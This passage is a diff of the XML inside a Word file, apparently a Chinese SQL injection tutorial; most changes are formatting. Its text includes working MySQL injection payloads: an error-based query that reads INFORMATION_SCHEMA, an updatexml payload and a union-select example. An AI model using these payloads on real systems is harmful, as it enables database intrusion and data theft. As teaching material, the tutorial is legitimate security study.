                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>PHP_INI_SYSTEM</w:t>
             </w:r>
           </w:p>
@@ -8827,6 +8796,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>使用</w:t>
             </w:r>
             <w:r>
@@ -8901,6 +8871,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>3</w:t>
             </w:r>
           </w:p>
@@ -12184,7 +12155,6 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>mysql_list_fields()</w:t>
             </w:r>
           </w:p>
@@ -14739,6 +14709,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>常量</w:t>
             </w:r>
           </w:p>
@@ -15261,7 +15232,6 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>MYSQL_CLIENT_SSL</w:t>
             </w:r>
           </w:p>
@@ -16457,6 +16427,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>获取系统平台</w:t>
       </w:r>
     </w:p>
@@ -16510,7 +16481,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>利用</w:t>
       </w:r>
       <w:r>
@@ -17160,6 +17130,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>SQL</w:t>
       </w:r>
       <w:r>
@@ -17216,7 +17187,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>基于时间技术</w:t>
       </w:r>
     </w:p>
@@ -17403,13 +17373,54 @@
         </w:rPr>
         <w:t>。</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>其实</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中有很多种</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>error-based</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>注入，这里只列出了几种。</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="38"/>
+          <w:numId w:val="62"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -17528,6 +17539,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="51"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17700,10 +17715,7 @@
                               <w:t>SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a717071,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7170626b71,0x78))s), 844674407370955161</w:t>
                             </w:r>
                             <w:r>
-                              <w:t>0, 8446744073709551610));</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t xml:space="preserve"> -- demo</w:t>
+                              <w:t>0, 8446744073709551610)); -- demo</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -17796,10 +17808,7 @@
                         <w:t>SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a717071,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7170626b71,0x78))s), 844674407370955161</w:t>
                       </w:r>
                       <w:r>
-                        <w:t>0, 8446744073709551610));</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve"> -- demo</w:t>
+                        <w:t>0, 8446744073709551610)); -- demo</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -17812,58 +17821,164 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
+        <w:t>updatexml</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>注入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0">
+                <wp:extent cx="5274310" cy="1404620"/>
+                <wp:effectExtent l="0" t="0" r="21590" b="17780"/>
+                <wp:docPr id="11" name="文本框 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5274310" cy="1404620"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:t>or updatexml(1,concat(0x7e,database())</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>,0</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>)</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>%23</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="_x0000_s1028" type="#_x0000_t202" style="width:415.3pt;height:110.6pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox style="mso-fit-shape-to-text:t">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:t>or updatexml(1,concat(0x7e,database())</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>,0</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:t>%23</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:anchorlock/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:strike/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:tab/>
       </w:r>
       <w:r>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:strike/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>根据报错分析可以明确区分出最主要的两类错误类型</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:strike/>
         </w:rPr>
-        <w:t>根据报错分析可以明确区分出最主要的两类错误类型</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:strike/>
-        </w:rPr>
         <w:t>。</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>字符型和数字型的基本原理</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="37"/>
+          <w:numId w:val="52"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>字符型和数字型的基本原理</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18106,7 +18221,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape id="_x0000_s1028" type="#_x0000_t202" style="width:415.5pt;height:110.6pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
+              <v:shape id="_x0000_s1029" type="#_x0000_t202" style="width:415.5pt;height:110.6pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
@@ -18310,7 +18425,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -18734,7 +18848,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="3A0774DD" id="_x0000_s1029" type="#_x0000_t202" style="width:415.3pt;height:39.1pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="3A0774DD" id="_x0000_s1030" type="#_x0000_t202" style="width:415.3pt;height:39.1pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
@@ -19363,7 +19477,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="7AD6F8B8" id="_x0000_s1030" type="#_x0000_t202" style="width:415.3pt;height:39.1pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="7AD6F8B8" id="_x0000_s1031" type="#_x0000_t202" style="width:415.3pt;height:39.1pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
@@ -19875,7 +19989,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="22C9ABD9" id="_x0000_s1031" type="#_x0000_t202" style="width:415.3pt;height:54.7pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="22C9ABD9" id="_x0000_s1032" type="#_x0000_t202" style="width:415.3pt;height:54.7pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
@@ -21647,6 +21761,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>访问操作系统</w:t>
       </w:r>
     </w:p>
@@ -21835,7 +21950,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -21960,6 +22074,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="53"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:t>MySQL</w:t>
@@ -22274,6 +22392,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>根据</w:t>
       </w:r>
       <w:r>
@@ -22666,7 +22785,6 @@
         <w:ind w:firstLineChars="0"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>url</w:t>
       </w:r>
     </w:p>
@@ -22901,6 +23019,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="54"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -23150,6 +23272,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -23329,13 +23452,16 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>暴力破解</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="55"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -23409,13 +23535,7 @@
                         <w:txbxContent>
                           <w:p>
                             <w:r>
-                              <w:t xml:space="preserve">select * from table where username=’xx’ union select 1,2,0x5346… order by 3 desc </w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t xml:space="preserve">-- </w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t>mysql</w:t>
+                              <w:t>select * from table where username=’xx’ union select 1,2,0x5346… order by 3 desc -- mysql</w:t>
                             </w:r>
                             <w:r>
                               <w:t>语句（字符</w:t>
@@ -23443,18 +23563,12 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape id="_x0000_s1032" type="#_x0000_t202" style="width:394pt;height:110.6pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
+              <v:shape id="_x0000_s1033" type="#_x0000_t202" style="width:394pt;height:110.6pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
                       <w:r>
-                        <w:t xml:space="preserve">select * from table where username=’xx’ union select 1,2,0x5346… order by 3 desc </w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve">-- </w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t>mysql</w:t>
+                        <w:t>select * from table where username=’xx’ union select 1,2,0x5346… order by 3 desc -- mysql</w:t>
                       </w:r>
                       <w:r>
                         <w:t>语句（字符</w:t>
@@ -23504,6 +23618,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="56"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:t>IIS</w:t>
@@ -23821,6 +23939,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="57"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:t>Php+apache</w:t>
@@ -23991,6 +24113,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>HPP</w:t>
       </w:r>
       <w:r>
@@ -24038,6 +24161,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="58"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -24306,7 +24433,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>DB</w:t>
       </w:r>
       <w:r>
@@ -24357,10 +24483,10 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.5pt;height:45pt" o:ole="">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.5pt;height:45.05pt" o:ole="">
             <v:imagedata r:id="rId54" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1559484380" r:id="rId55"/>
+          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1560668734" r:id="rId55"/>
         </w:object>
       </w:r>
       <w:r>
@@ -24370,6 +24496,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="59"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:t>M</w:t>
@@ -24839,6 +24969,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>单引号：</w:t>
       </w:r>
       <w:r>
@@ -25082,7 +25213,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>*</w:t>
       </w:r>
       <w:r>
@@ -25547,6 +25677,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>等价</w:t>
       </w:r>
       <w:r>
@@ -25750,7 +25881,6 @@
         <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Concat()</w:t>
       </w:r>
       <w:r>
@@ -26147,9 +26277,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="60"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26549,6 +26680,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b w:val="0"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>@@datadir</w:t>
             </w:r>
           </w:p>
@@ -26676,11 +26808,6 @@
             <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -26708,9 +26835,6 @@
           <w:p>
             <w:pPr>
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -26791,11 +26915,6 @@
             <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:t>left(‘string’,num)</w:t>
             </w:r>
@@ -26808,9 +26927,6 @@
           <w:p>
             <w:pPr>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -26880,9 +26996,6 @@
           <w:p>
             <w:pPr>
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -26915,11 +27028,6 @@
             <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -26938,9 +27046,6 @@
           <w:p>
             <w:pPr>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -26962,11 +27067,6 @@
             <w:tcW w:w="2500" w:type="pct"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -26985,9 +27085,6 @@
           <w:p>
             <w:pPr>
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -27073,11 +27170,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27133,16 +27225,10 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>MySQL</w:t>
             </w:r>
           </w:p>
@@ -27269,11 +27355,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27330,11 +27411,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27412,11 +27488,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27472,11 +27543,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27549,9 +27615,6 @@
           <w:p>
             <w:pPr>
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -27578,11 +27641,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27627,11 +27685,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -27705,11 +27758,6 @@
             <w:tcW w:w="1413" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
